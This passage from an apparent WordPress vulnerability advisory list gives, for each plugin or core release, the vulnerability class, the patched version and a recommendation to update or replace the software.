Recommended Action: Update to version 1.3.7, or a newer patched version

Plugin: SEO Slider

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: WordPress Live Chat Plugin for Elementor – LiveChat

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.14
Recommended Action: Update to version 1.0.14, or a newer patched version

Plugin: Easy Custom Auto Excerpt

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.4.7
Recommended Action: Update to version 2.4.7, or a newer patched version

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Insecure Backup/Logfile Generation
Patched Version: 5.3.1
Recommended Action: Update to version 5.3.1, or a newer patched version

Plugin: FourSquare Checkins

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: SiteBuilder Dynamic Components

Vulnerability: PHP Object Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Photospace Gallery

Vulnerability: Missing Authorization to Plugin Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPshop 2 – E-Commerce

Vulnerability: Arbitrary File Upload
Patched Version: 1.3.9.6
Recommended Action: Update to version 1.3.9.6, or a newer patched version

Plugin: Quiz Expert – Easy Quiz Maker, Exam and Test Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple Download Monitor

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 3.3.9
Recommended Action: Update to version 3.3.9, or a newer patched version

Plugin: Jetpack CRM – Clients, Leads, Invoices, Billing, Email Marketing, & Automation

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 5.5.1
Recommended Action: Update to version 5.5.1, or a newer patched version

Plugin: WP CSV Exporter

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.3.7
Recommended Action: Update to version 1.3.7, or a newer patched version

Plugin: xili-tidy-tags

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.12.04
Recommended Action: Update to version 1.12.04, or a newer patched version

Plugin: MyCurator Content Curation

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.75
Recommended Action: Update to version 3.75, or a newer patched version

Plugin: Visitor Traffic Real Time Statistics

Vulnerability: Missing Authorization to Arbitrary Plugin Installation/Activation
Patched Version: 2.12
Recommended Action: Update to version 2.12, or a newer patched version

Plugin: WordPress WP-Advanced-Search

Vulnerability: SQL Injection
Patched Version: 3.3.7
Recommended Action: Update to version 3.3.7, or a newer patched version

Plugin: Check & Log Email – Easy Email Testing & Mail logging

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.5.2
Recommended Action: Update to version 0.5.2, or a newer patched version

Plugin: YOP Poll

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.8.1
Recommended Action: Update to version 5.8.1, or a newer patched version

Plugin: Download Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.54
Recommended Action: Update to version 3.2.54, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Insecure Direct Object Reference
Patched Version: 7.3.7
Recommended Action: Update to version 7.3.7, or a newer patched version

Plugin: Counter Box: Add Engaging Countdowns, Timers & Counters to Your WordPress Site

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Limit Login Attempts

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Booking for Appointments and Events Calendar – Amelia

Vulnerability: Stored Cross-Site Scripting via Shortcode
Patched Version: 1.0.86
Recommended Action: Update to version 1.0.86, or a newer patched version

Plugin: My Calendar – Accessible Event Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.3.25
Recommended Action: Update to version 3.3.25, or a newer patched version

Plugin: WP Job Openings – Job Listing, Career Page and Recruitment Plugin

Vulnerability: Information Exposure
Patched Version: 3.4.3
Recommended Action: Update to version 3.4.3, or a newer patched version

Plugin: Calculated Fields Form

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.0.354
Recommended Action: Update to version 1.0.354, or a newer patched version

Plugin: Easy Testimonials

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.9
Recommended Action: Update to version 3.9, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.39
Recommended Action: Update to version 3.39, or a newer patched version

Plugin: Table Rate Shipping Method for WooCommerce by Flexible Shipping

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.11.9
Recommended Action: Update to version 4.11.9, or a newer patched version

Plugin: Simple Login Log

Vulnerability: SQL Injection
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Acunetix WP Security

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.0.5
Recommended Action: Update to version 4.0.5, or a newer patched version

Plugin: Find and Replace All

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: Video Conferencing with Zoom

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.9.3
Recommended Action: Update to version 3.9.3, or a newer patched version

Plugin: Blog Designer

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.8.12
Recommended Action: Update to version 1.8.12, or a newer patched version

Plugin: eBecas

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Authenticated (Author+) Cross-Site Scripting via File Uploads
Patched Version: 3.7.33
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.33, 3.8.33, 3.9.31, 4.0.30, 4.1.30, 4.2.27, 4.3.23, 4.4.22, 4.5.21, 4.6.18, 4.7.17, 4.8.13, 4.9.14, 5.0.9, 5.1.5, 5.2.6, 5.3.3, 5.4.1

Plugin: Announcement & Notification Banner – Bulletin

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 3.5.3
Recommended Action: Update to version 3.5.3, or a newer patched version

Plugin: Ninja Tables – Easy Data Table Builder

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.3.5
Recommended Action: Update to version 4.3.5, or a newer patched version

Plugin: eShop

Vulnerability: Cross-Site Request Forgery and Reflected Cross-Site Scripting
Patched Version: 6.3.14
Recommended Action: Update to version 6.3.14, or a newer patched version

Plugin: EDD Favorites

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: amerisale-re

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Encrypted Blog

Vulnerability: Open Redirect
Patched Version: 0.0.6.6
Recommended Action: Update to version 0.0.6.6, or a newer patched version

Plugin: Featured Post Creative

Vulnerability: Cross-Site Request Forgery via wpfp_update_featured_post
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: My Tickets – Accessible Event Ticketing

Vulnerability: Authorization Bypass
Patched Version: 1.9.12
Recommended Action: Update to version 1.9.12, or a newer patched version

Plugin: bbPress Voting

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.1.11.1
Recommended Action: Update to version 2.1.11.1, or a newer patched version

Plugin: Mega Addons For WPBakery Page Builder

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Thumbnail Slider With Lightbox

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.18
Recommended Action: Update to version 1.0.18, or a newer patched version

Plugin: WP Vault

Vulnerability: Local File Inclusion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Animated Counters

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.8
Recommended Action: Update to version 1.8, or a newer patched version

Core: WordPress

Vulnerability: Full Path Disclosure
Patched Version: 2.5
Recommended Action: Update to version 2.5, or a newer patched version

Plugin: easy.jobs- Best Recruitment Plugin for Job Board Listing, Manager, Career Page for Elementor & Gutenberg

Vulnerability: Missing Authorization to Settings Update
Patched Version: 2.4.7
Recommended Action: Update to version 2.4.7, or a newer patched version

Plugin: Mark Posts

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: Human Presence – Stop Form Spam Without ReCaptcha

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Core: WordPress

Vulnerability: Cryptographic Weakness
Patched Version: 2.6.1
Recommended Action: Update to version 2.6.1, or a newer patched version

Plugin: Stout Google Calendar

Vulnerability: Cross-Site Request Forgery via sgc_plugin_options
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Affiliates Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.6.6
Recommended Action: Update to version 2.6.6, or a newer patched version

Plugin: Amazonify

Vulnerability: Cross-Site Request Forgery to Amazon Tracking ID Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: YOP Poll

Vulnerability: Reusable Captcha via validateImage
Patched Version: 6.5.29
Recommended Action: Update to version 6.5.29, or a newer patched version

Plugin: WCP Contact Form

Vulnerability: Reflected Cross-Site Scripting via tab parameter
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: API info for Plugins & Themes from WP.ORG

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.05
Recommended Action: Update to version 1.05, or a newer patched version

Plugin: Anti-Malware Security and Brute-Force Firewall

Vulnerability: Cross-Site Scripting
Patched Version: 4.15.23
Recommended Action: Update to version 4.15.23, or a newer patched version

Plugin: S3bubble Amazon S3 Media Streaming

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SrbTransLatin – Serbian Latinisation

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.47
Recommended Action: Update to version 1.47, or a newer patched version

Plugin: Predictive Search

Vulnerability: Missing Authorization
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 4.2.0
Recommended Action: Update to version 4.2.0, or a newer patched version

Plugin: Hover Image

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Missing Authorization Checks
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Forms

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.12.3
Recommended Action: Update to version 1.12.3, or a newer patched version

Plugin: Relevanssi – A Better Search (Pro)

Vulnerability: SQL Injection
Patched Version: 1.14.6.1
Recommended Action: Update to version 1.14.6.1, or a newer patched version

Plugin: Helpful

Vulnerability: Authorization Bypass to Repeat Voting
Patched Version: 4.5.15
Recommended Action: Update to version 4.5.15, or a newer patched version

Plugin: Clean Login

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: UpdraftPlus: WP Backup & Migration Plugin

Vulnerability: Information Disclosure via updraft_ajaxrestore
Patched Version: 1.23.1
Recommended Action: Update to version 1.23.1, or a newer patched version

Plugin: Barcode Scanner and Inventory manager. POS (Point of Sale) – scan barcodes & create orders with barcode reader.

Vulnerability: Unauthenticated Arbitrary File Upload via uploadFile
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Custom Field Template

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 2.5.2
Recommended Action: Update to version 2.5.2, or a newer patched version

Plugin: Font Organizer

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Poll Maker – Versus Polls, Anonymous Polls, Image Polls

Vulnerability: Missing Authorization
Patched Version: 4.8.1
Recommended Action: Update to version 4.8.1, or a newer patched version

Plugin: Watu Quiz

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 2.6.8
Recommended Action: Update to version 2.6.8, or a newer patched version

Plugin: WordPress Checkout

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Exploit Scanner

Vulnerability: Full Path Disclosure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WooSidebars Sidebar Manager Converter

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Stetic

Vulnerability: No subtitle
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: WordPress Calls to Action

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 2.2.8
Recommended Action: Update to version 2.2.8, or a newer patched version

Plugin: bird-feeder

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Pricing Tables For WPBakery Page Builder (formerly Visual Composer)

Vulnerability: Authenticated (Subscriber+) Local File Inclusion via Shortcode
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Community by PeepSo – Download from PeepSo.com

Vulnerability: Missing Authorization to Sensitive Information Exposure
Patched Version: 6.1.0.0
Recommended Action: Update to version 6.1.0.0, or a newer patched version

Plugin: YourChannel: Everything you want in a YouTube plugin.

Vulnerability: Missing Authorization to Plugin Settings Reset
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: Admin Custom Login

Vulnerability: No subtitle
Patched Version: 3.2.8
Recommended Action: Update to version 3.2.8, or a newer patched version

Plugin: Easy Digital Downloads – Recount Earnings

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GEO Redirector

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Smart Forms – when you need more than just a contact form

Vulnerability: Missing Authorization to Sensitive Information Disclosure
Patched Version: 2.6.71
Recommended Action: Update to version 2.6.71, or a newer patched version

Plugin: Appointment Calendar

Vulnerability: Multiple Reflected Cross-Site Scripting
Patched Version: 2.7.5
Recommended Action: Update to version 2.7.5, or a newer patched version

Plugin: Debug Meta Data

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Client Reports

Vulnerability: Missing Authorization to Sensitive Information Exposure
Patched Version: 1.0.17
Recommended Action: Update to version 1.0.17, or a newer patched version

Plugin: URL Shortener by MyThemeShop

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Cart66 Lite :: WordPress Ecommerce

Vulnerability: SQL Injection
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: Quick Post Duplicator

Vulnerability: Authenticated (Contributor+) SQL Injection via post_id
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Popup Images

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Customer Reviews for WooCommerce

Vulnerability: Sensitive Data Exposure
Patched Version: 5.3.6
Recommended Action: Update to version 5.3.6, or a newer patched version

Plugin: Oxygen

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.4
Recommended Action: Update to version 4.4, or a newer patched version

Plugin: Statify – Extended Evaluation

Vulnerability: Authenticated (Admin+) CSV Injection
Patched Version: 2.6.4
Recommended Action: Update to version 2.6.4, or a newer patched version

Plugin: WPlite

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Request a Quote

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.3.8
Recommended Action: Update to version 2.3.8, or a newer patched version

Plugin: Shortcode for Current Date

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.1.5
Recommended Action: Update to version 2.1.5, or a newer patched version

Plugin: Rating by BestWebSoft

Vulnerability: Rating Denial of Service
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Smart Marketing SMS and Newsletters Forms

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: WPForms – Easy Form Builder for WordPress – Contact Forms, Payment Forms, Surveys, & More

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.8.1
Recommended Action: Update to version 1.4.8.1, or a newer patched version

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.2
Recommended Action: Update to version 4.2, or a newer patched version

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Captcha Bypass
Patched Version: 4.1.3
Recommended Action: Update to version 4.1.3, or a newer patched version

Plugin: Paytm Payment Gateway

Vulnerability: Unauthenticated Server-Side Request Forgery
Patched Version: 2.7.3
Recommended Action: Update to version 2.7.3, or a newer patched version

Plugin: Albo Pretorio On line

Vulnerability: Unauthenticated Sensitive Information Disclosure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Super Cache

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Team Member – Multi Language Supported Team Plugin

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting via new_style_name
Patched Version: 4.5
Recommended Action: Update to version 4.5, or a newer patched version

Plugin: Unyson

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: teachPress

Vulnerability: Cross-Site Request Forgery via delete_database()
Patched Version: 9.0.6
Recommended Action: Update to version 9.0.6, or a newer patched version

Plugin: Mesmerize Companion

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.6.135
Recommended Action: Update to version 1.6.135, or a newer patched version

Core: WordPress

Vulnerability: Arbitrary User Password Reset
Patched Version: 2.6.2
Recommended Action: Update to version 2.6.2, or a newer patched version

Plugin: Modula Image Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.6.7
Recommended Action: Update to version 2.6.7, or a newer patched version

Plugin: Cooked Pro

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.5.6
Recommended Action: Update to version 1.7.5.6, or a newer patched version

Plugin: WPMobile.App — Android and iOS Mobile Application

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 11.19
Recommended Action: Update to version 11.19, or a newer patched version

Plugin: spideranalyse

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Q and A

Vulnerability: No subtitle
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: iPanorama 360 – Advanced Virtual Tour Builder

Vulnerability: Authenticated (Contributor+) SQL Injection via Shortcode
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: Smooth Slider

Vulnerability: Authenticated SQL Injection
Patched Version: 2.7
Recommended Action: Update to version 2.7, or a newer patched version

Plugin: User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.4.8
Recommended Action: Update to version 3.4.8, or a newer patched version

Plugin: MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor

Vulnerability: Authenticated (Subscriber+) Information Disclosure via ‘mf_first_name’ shortcode
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: Smooth Slider

Vulnerability: Authenticated SQL Injection
Patched Version: 2.8.7
Recommended Action: Update to version 2.8.7, or a newer patched version

Plugin: MainWP Post Plus Extension

Vulnerability: Missing Authorization to Arbitrary Page/Post Deletion
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: WP Ultimate Email Marketer

Vulnerability: Authentication Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: YITH Maintenance Mode

Vulnerability: Multiple Authenticated Stored Cross-Site Scripting
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: User Registration & Membership – Custom Registration Form, Login Form, and User Profile

Vulnerability: Authenticated (Subscriber+) PHP Object Injection
Patched Version: 3.0.2
Recommended Action: Update to version 3.0.2, or a newer patched version

Plugin: EasyRecipe

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Modula Image Gallery

Vulnerability: Missing Authorization to Plugin Settings Change
Patched Version: 2.6.91
Recommended Action: Update to version 2.6.91, or a newer patched version

Plugin: Under Construction / Maintenance Mode from Acurax

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Comments – wpDiscuz

Vulnerability: Authenticated (Author+) Insecure Direct Object Reference
Patched Version: 7.6.4
Recommended Action: Update to version 7.6.4, or a newer patched version

Plugin: WP Shamsi – افزونه تاریخ شمسی و فارسی ساز وردپرس

Vulnerability: Missing Authorization to Plugin Settings Update
Patched Version: 4.2.0
Recommended Action: Update to version 4.2.0, or a newer patched version

Plugin: Icons for Features

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.1.3
Recommended Action: Update to version 1.5.1.3, or a newer patched version

Plugin: Folders – Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager

Vulnerability: Authenticated (Author+) Arbitrary File Upload
Patched Version: 2.9.3
Recommended Action: Update to version 2.9.3, or a newer patched version

Plugin: H5P CSS Editor

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Avada (Fusion) Builder

Vulnerability: Missing Authorization
Patched Version: 3.11.2
Recommended Action: Update to version 3.11.2, or a newer patched version

Plugin: GTM Server Side

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: 3CX Free Live Chat, Calls & WhatsApp

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 8.0.27
Recommended Action: Update to version 8.0.27, or a newer patched version

Plugin: wpForo Forum

Vulnerability: Reflected Cross-Site Scripting via ‘wpforo_debug’
Patched Version: 2.1.9
Recommended Action: Update to version 2.1.9, or a newer patched version

Plugin: wordpress-gallery-transformation

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ivory Search – WordPress Search Plugin

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 4.8
Recommended Action: Update to version 4.8, or a newer patched version

Plugin: YARPP – Yet Another Related Posts Plugin

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 5.30.4
Recommended Action: Update to version 5.30.4, or a newer patched version

Plugin: Rename wp-login.php

Vulnerability: Cross-Site Request Forgery & Unauthenticated Settings Change
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Pixabay Images

Vulnerability: Directory Traversal
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: My Agile Privacy – The only GDPR solution for WP that you can truly trust

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting

Vulnerability: Sensitive Data Exposure
Patched Version: 1.10.6
Recommended Action: Update to version 1.10.6, or a newer patched version

Plugin: CP Blocks

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 1.0.21
Recommended Action: Update to version 1.0.21, or a newer patched version

Plugin: Social Count Plus

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.3
Recommended Action: Update to version 3.0.3, or a newer patched version

Plugin: Easy Media Gallery Pro

Vulnerability: Cross-Site Request Forgery and Cross-Site Scripting
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Authenticated (level_5+) SQL Injection via get_logs
Patched Version: 2.8.22
Recommended Action: Update to version 2.8.22, or a newer patched version

Plugin: CallRail Phone Call Tracking

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 0.5.3
Recommended Action: Update to version 0.5.3, or a newer patched version

Plugin: reCaptcha by BestWebSoft

Vulnerability: CAPTCHA Bypass
Patched Version: 1.13
Recommended Action: Update to version 1.13, or a newer patched version

Plugin: Optin Forms – Simple List Building Plugin for WordPress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Business Directory Plugin – Easy Listing Directories for WordPress

Vulnerability: Cross-Site Request Forgery to Arbitrary File Upload
Patched Version: 5.11
Recommended Action: Update to version 5.11, or a newer patched version

Plugin: WP Easy Gallery – WordPress Gallery Plugin

Vulnerability: SQL Injection
Patched Version: 2.7.1
Recommended Action: Update to version 2.7.1, or a newer patched version

Plugin: Author Bio Box

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: SupportCandy – Helpdesk & Customer Support Ticket System

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.7
Recommended Action: Update to version 2.2.7, or a newer patched version

Plugin: Wicked Folders

Vulnerability: Missing Authorization via ajax_delete_folder
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: All In One Redirection

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 2.2.0
